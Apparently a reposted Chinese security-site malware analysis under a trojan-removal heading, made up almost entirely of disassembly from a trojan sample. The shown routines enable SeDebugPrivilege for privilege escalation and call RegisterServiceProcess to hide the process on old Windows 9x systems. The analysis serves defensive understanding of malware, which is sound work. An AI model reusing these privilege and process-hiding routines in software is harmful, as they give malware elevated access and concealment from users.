您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

木马查杀

2013-5-30 12:01| 投稿: security

摘要:   提权:  代码:  seg001:00406394 AdjustPrivilege proc near  seg001:00406394  seg001:00406394  &...
  提权:  代码:  seg001:00406394 AdjustPrivilege proc near  seg001:00406394  seg001:00406394                 push    ebx  seg001:00406395                 add     esp, 0FFFFFFD0h  seg001:00406398                 lea     eax, [esp+30h+TokenHandle]  seg001:0040639C                 push    eax             ; TokenHandle  seg001:0040639D                 push    20h             ; DesiredAccess  seg001:0040639F                 call    GetCurrentProcess  seg001:0040639F  seg001:004063A4                 push    eax             ; ProcessHandle  seg001:004063A5                 call    OpenProcessToken  seg001:004063A5  seg001:004063AA                 lea     eax, [esp+30h+Luid]  seg001:004063AE                 push    eax             ; lpLuid  seg001:004063AF                 push    offset Name     ; "SeDebugPrivilege"  seg001:004063B4                 push    0               ; lpSystemName  seg001:004063B6                 call    LookupPrivilegeValueA  seg001:004063B6  seg001:004063BB                 mov     eax, [esp+30h+Luid.LowPart]  seg001:004063BF                 mov     [esp+30h+NewState.Privileges.Luid.LowPart], eax  seg001:004063C3                 mov     eax, [esp+30h+Luid.HighPart]  seg001:004063C7                 mov     [esp+30h+NewState.Privileges.Luid.HighPart], eax  seg001:004063CB                 mov     [esp+30h+NewState.PrivilegeCount], 1  seg001:004063D3                 xor     ebx, ebx  seg001:004063D5                 mov     [esp+30h+NewState.Privileges.Attributes], ebx  seg001:004063D9                 push    esp             ; ReturnLength  seg001:004063DA                 lea     eax, [esp+34h+PreviousState]  seg001:004063DE                 push    eax             ; PreviousState  seg001:004063DF                 push    10h             ; BufferLength  seg001:004063E1                 lea     eax, [esp+3Ch+NewState]  seg001:004063E5                 push    eax             ; NewState  seg001:004063E6                 push    0               ; DisableAllPrivileges  seg001:004063E8                 mov     eax, [esp+44h+TokenHandle]  seg001:004063EC                 push    eax             ; TokenHandle  seg001:004063ED                 call    AdjustTokenPrivileges  seg001:004063ED  seg001:004063F2                 mov     eax, [esp+30h+Luid.LowPart]  seg001:004063F6                 mov     [esp+30h+PreviousState.Privileges.Luid.LowPart], eax  seg001:004063FA                 mov     eax, [esp+30h+Luid.HighPart]  seg001:004063FE                 mov     [esp+30h+PreviousState.Privileges.Luid.HighPart], eax  seg001:00406402                 mov     [esp+30h+PreviousState.PrivilegeCount], 1  seg001:0040640A                 or      ebx, 2  seg001:0040640D                 mov     [esp+30h+PreviousState.Privileges.Attributes], ebx  seg001:00406411                 push    esp             ; ReturnLength  seg001:00406412                 push    0               ; PreviousState  seg001:00406414                 mov     eax, [esp+38h+BufferLength]  seg001:00406418                 push    eax             ; BufferLength  seg001:00406419                 lea     eax, [esp+3Ch+PreviousState]  seg001:0040641D                 push    eax             ; NewState  seg001:0040641E                 push    0               ; DisableAllPrivileges  seg001:00406420                 mov     eax, [esp+44h+TokenHandle]  seg001:00406424                 push    eax             ; TokenHandle  seg001:00406425                 call    AdjustTokenPrivileges  seg001:00406425  seg001:0040642A                 add     esp, 30h  seg001:0040642D                 pop     ebx  seg001:0040642E                 retn  seg001:0040642E  seg001:0040642E AdjustPrivilege endp  注册为系统服务,试图在9X系统上隐藏进程:  代码:  seg001:00406598 RegisterService proc near  seg001:00406598  seg001:00406598                 add     esp, 0FFFFFF6Ch  seg001:0040659E                 mov     [esp+94h+var_94], 94h  seg001:004065A5                 push    esp             ; lpVersionInformation  seg001:004065A6                 call    GetVersionExA  seg001:004065A6  seg001:004065AB                 cmp     eax, 1  seg001:004065AE                 sbb     eax, eax  seg001:004065B0                 inc     eax  seg001:004065B1                 cmp     al, 1  seg001:004065B3                 jnz     short loc_4065FE  seg001:004065B3  seg001:004065B5                 cmp     [esp+94h+var_84], 2  seg001:004065BA                 jz      short loc_4065FE  seg001:004065BA  seg001:004065BC                 push    offset s_Kernel32_dll ; "kernel32.dll"  seg001:004065C1                 call    LoadLibraryA  seg001:004065C1  seg001:004065C6                 mov     hModule, eax  seg001:004065CB                 cmp     hModule, 0  seg001:004065D2                 jz      short loc_4065FE  seg001:004065D2  seg001:004065D4                 push    offset s_Registerservi ; "RegisterServiceProcess"  seg001:004065D9                 mov     eax, hModule  seg001:004065DE                 push    eax             ; hModule  seg001:004065DF                 call    GetProcAddress  seg001:004065DF  seg001:004065E4                 mov     addr_RegisterServiceProcess, eax  seg001:004065E9                 push    1  seg001:004065EB                 push    0  seg001:004065ED                 call    addr_RegisterServiceProcess  seg001:004065F3                 mov     eax, hModule  seg001:004065F8                 push    eax             ; hLibModule  seg001:004065F9                 call    FreeLibrary_0   ; "kernel32.dll"  seg001:004065F9  seg001:004065FE loc_4065FE:  seg001:004065FE                 add     esp, 94h  seg001:00406604                 retn  seg001:00406604  seg001:00406604 RegisterService endp

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部